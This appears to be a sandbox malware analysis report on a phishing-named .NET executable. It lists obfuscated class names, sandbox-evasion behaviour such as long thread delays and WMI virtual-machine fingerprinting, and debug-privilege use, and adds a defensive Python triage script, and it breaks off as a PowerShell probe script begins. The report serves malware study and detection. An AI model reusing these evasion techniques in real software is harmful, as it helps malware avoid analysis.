Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, icguhxMxu9hdKnfBif.cs | High entropy of concatenated method names: 'ToString', 'VirSfDdAFk', 'oviSBXFtS6', 'QMJSm4r73L', 'dGmSPc4qsg', 'QdJSocZdGy', 'JjmSA5PvlP', 'KYqSv6E8ty', 'x3iSKgsbe7', 'tQTSpEWubK'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, No5wVbGi2FjI1MyTZU.cs | High entropy of concatenated method names: 'vWsyiU9gdh', 'AypyB9b2Hq', 'nAgymChUpO', 'dE2yP4wQxG', 'eR2y5v2Jvn', 'MVRyoNRU0u', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, L53jeqg7TU3usVYAQC.cs | High entropy of concatenated method names: 'av804Aq3dO', 'oPg0wsWmXc', 'iPh0inMgrG', 'm1H0BefjKc', 'veG0PnOHnK', 'ui20oeRsF6', 'jAH0vZC1xq', 'z5X0KWhxlE', 'f9M0uFZKDq', 'WpK0f30Yv6'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, s9YxdXpYvmj4sEtJwg.cs | High entropy of concatenated method names: 'HO1ZX0dFDv', 'i3BZ8prWVg', 'ToString', 'sRxZgSgPOe', 'lDJZjGiZuG', 'HgbZT43KMJ', 'zoWZbveHwY', 'KB1Zd2KZID', 'suQZOy0gHX', 'LgEZlEQ9U9'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, z8V6tSE9Kmk8VtHnQ3.cs | High entropy of concatenated method names: 'L5CdGnTvgO', 'B1qdjTHB0f', 'StGdb5CFl1', 'QTXdOyGcHV', 'Mbhdl9RtXq', 'MQebHF3Tss', 'RcAbsdgysV', 'yS1bLCMrSG', 'DL2ba6jfn3', 'QGdbCskcGG'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, F4KCalNgCf4yJJMxmi.cs | High entropy of concatenated method names: 'Dispose', 'twNcCypQt4', 'DafxBWJaWx', 'gPi77gulml', 'kHgcUuYmp0', 'BheczKE4aY', 'ProcessDialogKey', 'eaLxhP8s10', 'CnSxcYmxpC', 'bX5xxYUGmi'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, vP9haJacLPGwS8wXSo.cs | High entropy of concatenated method names: 'gPCOWRWtVk', 'lfgOrK9oJr', 'UIUOtL9dVg', 'LSmORlUOtj', 'wv7OVqjviB', 'CxQO6fGhUr', 'FeDOnNu062', 'fxsO4sQulE', 'bV8OwM5HIx', 'vbSOQiEOCC'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, IScEM5lWVrKlhRvUrx.cs | High entropy of concatenated method names: 'f8ScOHvsyX', 'CQMclHI8US', 'BGhcXUt12V', 'dBGc8wZ9V0', 'CvlcIcyqrA', 'dAucSPgoaM', 'TG85DLHDcuKtyVNtsE', 'vcZjHFlUJjecPQw7Qr', 'LQRccxpRSx', 'YE8c2pOpqN'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, kl5mmcflXMc65HWBwM.cs | High entropy of concatenated method names: 'z43ZaJ9ICd', 'MLqZUQGiTl', 'JTXyhUBsFF', 'g6YycB8J3W', 'yXQZfcO3pM', 'A2qZ9ylxBL', 'ueCZYEwZQV', 'qn0Z5nTE3R', 'LyLZe0C7Vu', 'C0fZJQkGX6'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, xjSqLJKLfArB0tpMCnq.cs | High entropy of concatenated method names: 'nmiDW2nTaS', 'sfiDrJEhwQ', 'Cn1DthvMD1', 'z6MDR33YNZ', 'EEyDVEGbo9', 'fKvD6tbi1S', 'Q4LDnVd7yr', 'O4ID4ancvc', 'FyIDwTOQrS', 'bfhDQjVN2v'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, FW07bIZxXrtNgWto45.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'M28xCk1chl', 'bqNxUJi5cj', 'WJJxzwRgaO', 'MbB2hbb01E', 'MkL2cbxg9c', 'D0o2x1DIOM', 'fd322XZAgl', 'UEtABwVANYrG79ytDCI'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, P3KWcgP03CKVL94tw3.cs | High entropy of concatenated method names: 'Ma7j5hJYxa', 'bg4jepGRwo', 'VJ3jJK1Tbv', 'cc2jMjpa1G', 'sI5jHbrttL', 'in9jsEXufZ', 'FdujLiQkKU', 'TsAja8hst3', 'JuTjCad4G4', 'HyFjUQAgur'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, gvDY8QB1YMmf2dncZA.cs | High entropy of concatenated method names: 'rmiTRqpWBA', 'bGQT6mDjw3', 'eAyT4lQquh', 't1dTw5SkW6', 'zSDTIv1EhE', 'mdMTSeNe5W', 'BVATZi9YXr', 'XseTyWURLl', 'yXrTD1SkeZ', 'K7KTFgtkVF'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, RgwcvmFYWkp0fMVSiK.cs | High entropy of concatenated method names: 's6Kygo7qZR', 'mPtyjV46c6', 'PgkyThw5Ku', 'CXEybHToy7', 'OkUydA6wws', 'nL5yOCChpk', 'lSOylIrOLn', 'J6Ayqx2RFb', 'rwcyXaT6yK', 'oI1y85gqsv'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, cmsXDtyGVO5FOEpadW.cs | High entropy of concatenated method names: 'efLDco7jCA', 'wZgD2xnuvK', 'P1QDNg6tUW', 'hF1DgYAUUC', 'wheDjVOWMF', 'YEBDb14kGl', 'oOODdaG1rr', 'vDMyL5MDrG', 'tG9yaiGFEV', 'FUxyC7dEp3'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, kBPjPwzFF5lF1uwwqm.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'b5AD06pxfl', 'dIfDIWQacJ', 'slDDSSAeEk', 'BhIDZNXPn3', 'TyiDy3dtBm', 'NodDDhcuZe', 'vqfDFF7Mel'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, ImIW4rKwf6tqNiiWNR3.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'c0xF5Pr4bY', 'cqkFeDi4OX', 'bPBFJvpMuD', 'mpOFMkQjyO', 'moiFH6fUNQ', 'c3YFsfO2uY', 'ECOFLOpiyw'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, iv04pT1Nje59B37HvY.cs | High entropy of concatenated method names: 'ImZ2Gx7xyZ', 'RqZ2gZFOMD', 'BjJ2jWuEDe', 'NG62TlLE7c', 'tEJ2b8N6le', 'tQu2drm0Ru', 'SIA2OPIVdm', 'Ekw2l5WILM', 'vle2qHvAuh', 'ziC2Xod8tV'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, l8ftM6oDY7WIIMNLOd.cs | High entropy of concatenated method names: 'C18bVSpGsQ', 'CNObnY7IF2', 'tC7Tm9QOhW', 'fnkTPZsumm', 'z4eToIHZWL', 'e4STAwWcnm', 'DovTvBY7nj', 'a80TKIynWT', 'gaLTppPsyK', 'mROTugtnN8'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, dyrVmPctQktPSrtNdw.cs | High entropy of concatenated method names: 'nXmOgoV2AG', 's4KOTERE7X', 'GLIOdu3IKS', 'qhCdUwvk9e', 'L7jdzOspfT', 'JbbOhtbYGT', 'TofOcBy4yc', 'D9SOx8X0D6', 'F23O21R0Qg', 'BWtONPaY0P'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, l2sJYh5K0ZNHRqvmDU.cs | High entropy of concatenated method names: 'e5vtvaU5e', 'L4qRU9qOW', 'flx6D0bih', 'B0GnhQH2d', 'g19wjoHRy', 'NGKQs9iho', 'N7eC3GKT6wBmVGvXic', 'a77CdxkuZemMFuw3Hk', 'nvQyVgcJY', 'KStFRUg8A'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, Qrig4VQZJw0SmAOp59.cs | High entropy of concatenated method names: 'be1Iuvnh8E', 'ki1I95fAFH', 'Q2xI5IFFIN', 'gnCIeRwoYG', 'WGFIBrbBjn', 'dXvImN6VJC', 'GfsIPFS2SZ', 'IN2IoimUxq', 'KoLIAwrg6T', 'ejEIv7tweD'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, icguhxMxu9hdKnfBif.cs | High entropy of concatenated method names: 'ToString', 'VirSfDdAFk', 'oviSBXFtS6', 'QMJSm4r73L', 'dGmSPc4qsg', 'QdJSocZdGy', 'JjmSA5PvlP', 'KYqSv6E8ty', 'x3iSKgsbe7', 'tQTSpEWubK'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, No5wVbGi2FjI1MyTZU.cs | High entropy of concatenated method names: 'vWsyiU9gdh', 'AypyB9b2Hq', 'nAgymChUpO', 'dE2yP4wQxG', 'eR2y5v2Jvn', 'MVRyoNRU0u', 'Next', 'Next', 'Next', 'NextBytes'
(The randomised identifiers are the output of a .NET name obfuscator; the few readable names left in each class, such as ToString, Dispose, ProcessDialogKey, CanConvertFrom and Next/NextBytes, are overrides of framework virtuals that a renamer must keep. The 0x3bfeaa0 and 0x8940000 dumps list exactly the same classes and method names, so they are two memory copies of one unpacked stage.)
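The three static findings in the block above (the 0xC32C0DAC link timestamp, the .text section entropy, and the per-class entropy of concatenated method names) can be reproduced without a sandbox. The script below is an example added for this page; it is not Joe Sandbox code and not code from the sample. It parses the PE headers with the standard library only, and because the analysed binary is not reproduced here it builds a small constructed PE image for its self-test; the two method-name lists are copied from the report lines above (one obfuscated class, and the framework overrides that the renamer left alone).

```python
"""Re-derive three static findings from a Joe Sandbox 'Data Obfuscation' block:
COFF TimeDateStamp sanity, per-section Shannon entropy and entropy of
concatenated .NET method names. Standard library only, no pefile dependency."""
import datetime
import math
import struct


def shannon_entropy(data) -> float:
    """Bits per symbol over a bytes object or a str (0.0 .. 8.0 for bytes)."""
    if not data:
        return 0.0
    counts = {}
    for sym in data:
        counts[sym] = counts.get(sym, 0) + 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def pe_timestamp_to_utc(tds: int) -> datetime.datetime:
    """COFF TimeDateStamp is seconds since 1970-01-01 UTC; timedelta arithmetic
    sidesteps platform time_t limits for far-future values such as 2073."""
    epoch = datetime.datetime(1970, 1, 1, tzinfo=datetime.timezone.utc)
    return epoch + datetime.timedelta(seconds=tds)


def timestamp_is_suspicious(tds: int, now: int) -> bool:
    """Zero (stripped) or later than the analysis time cannot be a real link time."""
    return tds == 0 or tds > now


def parse_pe(buf: bytes) -> dict:
    """Minimal PE walk: DOS header -> e_lfanew -> PE signature -> COFF header -> section table."""
    if buf[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsect, tds, _sym, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", buf, coff)
    table = coff + 20 + opt_size          # section headers follow the optional header
    sections = []
    for i in range(nsect):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", buf, table + 40 * i)
        raw = buf[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "size": raw_size, "entropy": shannon_entropy(raw)})
    return {"timestamp": tds, "sections": sections}


def method_name_entropy(names) -> float:
    """The report's heuristic: entropy of all method names of a class joined together."""
    return shannon_entropy("".join(names))


def build_sample_pe(tds: int, sections) -> bytes:
    """Constructed test image, NOT the analysed sample: DOS stub, COFF header with
    SizeOfOptionalHeader = 0, one 40-byte header per section, then raw section data."""
    nsect = len(sections)
    e_lfanew = 0x40
    data_ptr = e_lfanew + 4 + 20 + 40 * nsect
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, nsect, tds, 0, 0, 0, 0x0102)
    table, body = b"", b""
    for name, raw in sections:
        table += struct.pack("<8sIIII", name.ljust(8, b"\0"), len(raw), 0x1000, len(raw), data_ptr)
        table += b"\0" * 16                # relocation/line-number/characteristics fields, unused here
        body += raw
        data_ptr += len(raw)
    return dos + b"PE\0\0" + coff + table + body


# Values quoted in the report: the timestamp, one obfuscated class, and framework overrides.
REPORT_TIMESTAMP = 0xC32C0DAC
OBFUSCATED = ["av804Aq3dO", "oPg0wsWmXc", "iPh0inMgrG", "m1H0BefjKc", "veG0PnOHnK",
              "ui20oeRsF6", "jAH0vZC1xq", "z5X0KWhxlE", "f9M0uFZKDq", "WpK0f30Yv6"]
NORMAL = ["ToString", "Dispose", "ProcessDialogKey", "CanConvertFrom", "ConvertFrom",
          "ConvertTo", "EditValue", "GetEditStyle", "Next", "NextBytes"]


def triage(buf: bytes, now: int) -> dict:
    """Flag what the sandbox flagged: a future/zero timestamp and high-entropy sections."""
    pe = parse_pe(buf)
    return {"timestamp_utc": pe_timestamp_to_utc(pe["timestamp"]).strftime("%Y-%m-%d %H:%M:%S"),
            "timestamp_suspicious": timestamp_is_suspicious(pe["timestamp"], now),
            "high_entropy_sections": [s["name"] for s in pe["sections"] if s["entropy"] > 7.0]}


if __name__ == "__main__":
    # Constructed image: a uniformly distributed .text (entropy exactly 8.0) and an all-zero .rdata.
    image = build_sample_pe(REPORT_TIMESTAMP, [(b".text", bytes(range(256)) * 16), (b".rdata", b"\0" * 1024)])
    analysis_time = int(datetime.datetime(2024, 10, 1, tzinfo=datetime.timezone.utc).timestamp())
    print(triage(image, now=analysis_time))
    print("obfuscated %.2f bits/char vs framework names %.2f bits/char"
          % (method_name_entropy(OBFUSCATED), method_name_entropy(NORMAL)))
```

Run against a real file, `triage(open(path, "rb").read(), now=int(time.time()))` returns the same two verdicts the report gives for this sample: the timestamp decodes to 2073-10-05 15:50:04 UTC, and any section above roughly 7 bits per byte is packed or encrypted rather than ordinary code. The 7.0 threshold and the "greater than" comparison of name entropies are choices made for this example, not Joe Sandbox's exact cut-offs, which the report does not publish.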

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 identical entries collapsed)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 identical entries collapsed)
(These are the BitLocker module manifest and its en-US localisation data. PowerShell reads manifests under the system module path while resolving a command name, so opening them shows module auto-discovery running, not BitLocker cmdlets being executed; the command that triggered the discovery is the thing worth pulling from the process tree.)
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Process information set: NOOPENFILEERRORBOX (46 identical entries collapsed; this is SetErrorMode with SEM_NOOPENFILEERRORBOX, which suppresses the dialog Windows would otherwise show when a file cannot be found)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (84 identical entries collapsed; the PowerShell host process sets the same flag, so on its own this is a low-weight indicator)
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Process information set: NOOPENFILEERRORBOX (56 identical entries)

Malware Analysis System Evasion

Source: Yara match -> File source: Process Memory Space: PURCHASE ORDER-6350-2024.exe PID: 5688, type: MEMORYSTR
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Memory allocated: 10A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Memory allocated: 2A20000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Memory allocated: 4A20000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Memory allocated: 8AB0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Memory allocated: 9AB0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Memory allocated: 9CB0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Memory allocated: ACB0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Memory allocated: 12C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Memory allocated: 2D10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Memory allocated: 12C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Window / User API: threadDelayed 6233
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Window / User API: threadDelayed 3302
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Window / User API: threadDelayed 1185
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Window / User API: threadDelayed 4034
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 5908 -> Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7100 -> Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4564 -> Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 3876 -> Thread sleep count: 1185 > 30
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 3876 -> Thread sleep count: 4034 > 30
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -99875s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -99764s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -99653s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -99546s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -99422s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -99312s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -99203s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -99093s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -98984s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -98875s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -98703s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -98590s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -98469s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -98358s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -98250s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -98140s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -98031s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -97921s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -97812s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -97703s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -97594s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -97469s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe TID: 1600 -> Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 100000
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 99875
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 99764
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 99653
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 99546
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 99422
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 99312
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 99203
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 99093
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 98984
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 98875
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 98703
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 98590
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 98469
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 98358
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 98250
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 98140
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 98031
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 97921
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 97812
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 97703
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 97594
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 97469
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Thread delayed: delay time: 922337203685477
Source: PURCHASE ORDER-6350-2024.exe, 00000006.00000002.3269575553.00000000063B0000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Process token adjusted: Debug
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Process token adjusted: Debug
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe -> Memory allocated: page read and write | page guard
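The three WMI classes enumerated above (Win32_NetworkAdapterConfiguration, Win32_BaseBoard and Win32_Processor) are the usual .NET stealer probes for a virtual machine: the baseboard and processor strings name the hypervisor outright, and the adapter's MAC address carries a vendor OUI. The script below is an added example, not code from the report or from the sample. It re-runs the same probes with Get-CimInstance on the analysis machine and lists every value that gives the hypervisor away. Win32_BIOS and Win32_ComputerSystem are included on the assumption that the same families read them as well; the marker strings and the OUI table are the common hypervisor defaults and are assumptions of this example, not values taken from the report.

```powershell
# Added example (not from the report or the sample): replay the VM-fingerprint
# probes the sample issues over WMI against the analysis machine and list the
# values that reveal a hypervisor. The sample enumerates
# Win32_NetworkAdapterConfiguration, Win32_BaseBoard and Win32_Processor;
# Win32_BIOS and Win32_ComputerSystem are added here as an assumption, since
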